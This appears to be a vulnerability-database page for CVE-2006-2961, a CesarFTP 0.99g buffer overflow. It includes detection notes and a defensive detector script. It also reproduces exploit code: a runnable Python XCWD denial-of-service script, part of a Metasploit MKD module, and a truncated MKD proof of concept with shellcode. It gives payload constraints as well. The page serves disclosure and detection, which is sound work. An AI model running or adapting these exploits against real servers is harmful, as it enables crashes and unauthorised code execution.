CVE-2006-2961
Published 2006-06-12
Priority P356 · high · 7.5 CVSS 2.0
CVSS vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 61.94% (99.1th percentile)
Stack-based buffer overflow in CesarFTP 0.99g and earlier allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long MKD command. NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| aclogic | cesarftp | <= 0.99g | — |
Detection & IOCs (extracted from sources)
Bytes:
\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8\x22\x72\xe4
- Detect FTP MKD commands containing a large number of newline (0x0a) characters (671+) in the argument, indicative of the CesarFTP stack overflow exploit.
- Detect FTP XCWD commands containing 667 or more newline characters in the argument, indicative of the CesarFTP DoS exploit.
- Banner-check for 'CesarFTP 0.99g' on FTP port 21 to identify vulnerable targets.
- The exploit requires valid FTP credentials before triggering; monitor for authenticated FTP sessions followed by anomalously large MKD or XCWD commands.
- NOP sled (0x90 * 40) immediately following the return address in the MKD payload can be used as a byte-pattern signature for detection.
- Bad characters for payload encoding are null byte, space, newline, and carriage return; payloads avoiding these bytes in shellcode are characteristic of this exploit.
- Return addresses (RET values) are OS/SP-specific; the exploit must be targeted to the exact platform to achieve code execution rather than just a crash.
- Payload space is limited to 250 bytes and must avoid null bytes, spaces, newlines, and carriage returns.
- A large negative stack adjustment (-3500) is used in the Metasploit module to avoid overwriting the payload with function call stack frames.
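The newline-count checks in the notes above can be applied to a reassembled FTP control stream as follows. This is an added example, not code from the page's sources; the function name `scan_client_stream` and the sample streams are constructed for illustration, and the thresholds are the ones quoted in the notes.

```python
import re

# Newline-count thresholds from the detection notes on this page.
LF_THRESHOLDS = {b"MKD": 671, b"XCWD": 667}
NOP_SLED = b"\x90" * 40  # sled length from the MKD note

# Verb at the start of the stream or directly after a line ending.
_VERB = re.compile(rb"(?:^|\n)(MKD|XCWD) ", re.IGNORECASE)


def scan_client_stream(data: bytes) -> list:
    """Return one alert per MKD/XCWD command whose argument is packed with LF bytes.

    `data` is the reassembled client-to-server byte stream of one FTP control
    connection. It is scanned raw: a parser that splits on LF would cut the
    argument into hundreds of empty lines and never see the oversized command.
    """
    alerts = []
    for m in _VERB.finditer(data):
        verb = m.group(1).upper()
        # The argument ends at the first CRLF (CR is a bad character, so it
        # cannot occur inside the payload itself).
        end = data.find(b"\r\n", m.end())
        arg = data[m.end():] if end == -1 else data[m.end():end]
        lf_count = arg.count(b"\n")
        if lf_count >= LF_THRESHOLDS[verb]:
            alerts.append({
                "verb": verb.decode(),
                "lf_count": lf_count,
                "arg_len": len(arg),
                # Client sent PASS earlier on this connection (login attempted).
                "after_login": b"PASS " in data[:m.start()],
                "nop_sled": NOP_SLED in arg,
            })
    return alerts


# Constructed sample streams (not captured traffic).
BENIGN = b"USER ftp\r\nPASS ftp\r\nMKD reports\r\nXCWD /pub\r\n"
XCWD_SAMPLE = b"USER ftp\r\nPASS ftp\r\nXCWD " + b"\n" * 667 + b"\x90" * 20 + b"\r\n"
MKD_SAMPLE = b"USER ftp\r\nPASS ftp\r\nMKD " + b"\n" * 671 + b"AAAA" + NOP_SLED + b"\r\n"

if __name__ == "__main__":
    for name, stream in [("benign", BENIGN), ("xcwd", XCWD_SAMPLE), ("mkd", MKD_SAMPLE)]:
        print(name, scan_client_stream(stream))
```

The `after_login` field only records that the client sent `PASS`; confirming a successful login requires the server's reply on the other half of the connection.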
No detection rules found.
Exploit-DB
CesarFTP 0.99g - XCWD Denial of Service
exploitdb·2016-01-19
---
#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Exploit Title : CesarFTP 0.99g -(XCWD)Remote BoF Exploit
# Discovery by : Irving Aguilar
# Email : [email protected]
# Discovery Date : 18.01.2016
# Tested Version : 0.99g
# Vulnerability Type : Denial of Service (DoS)
# Tested on OS : Windows XP Professional SP3 x86 es
import socket
buffer = 'XCWD ' + '\n' * 667 +'\x90' * 20
target = '192.168.1.73'
port = 21
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((target, port))
print '[*] Target: ' + target
print '[*] Port: ' + str(port)
s.recv(1024)
s.send('USER ftp\r\n')
s.recv(1024)
s.send('PASS ftp\r\n')
s.recv(1024)
s.send( buffer + '\r\n')
print '[+] Buffer sent'
s.close()
Exploit-DB
CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit) (2)
exploitdb·2011-02-23
---
##
# $Id: cesarftp_mkd.rb 11799 2011-02-23 00:58:54Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Cesar FTP 0.99g MKD Command Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the MKD verb in CesarFTP 0.99g.
You must have valid credentials to trigger this vulnerability. Also, you
only get one chance, so choose your target carefully.
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revision: 11799 $',
'References' =>
Exploit-DB
CesarFTP 0.99g - 'MKD' Remote Buffer Overflow
exploitdb·2006-06-12
---
#!/usr/bin/python
#CesarFtp 0.99g 0day Exploit
#Proof of Concept: execute calc.exe
#Tested on XP sp2 polish
#Bug found by h07 [[email protected]]
#Date: 10.06.2006
from socket import *
shellcode = ( #execute calc.exe
"\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"
"\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1"
"\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07"
"\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25"
"\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5"
"\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d"
"\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4"
"\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\x
Metasploit
Cesar FTP 0.99g MKD Command Buffer Overflow
metasploit
This module exploits a stack buffer overflow in the MKD verb in CesarFTP 0.99g. You must have valid credentials to trigger this vulnerability. Also, you only get one chance, so choose your target carefully.
No writeups or analysis indexed.
- http://secunia.com/advisories/20574
- http://www.osvdb.org/26364
- http://www.securityfocus.com/bid/18586
- http://www.vupen.com/english/advisories/2006/2287
- https://exchange.xforce.ibmcloud.com/vulnerabilities/27071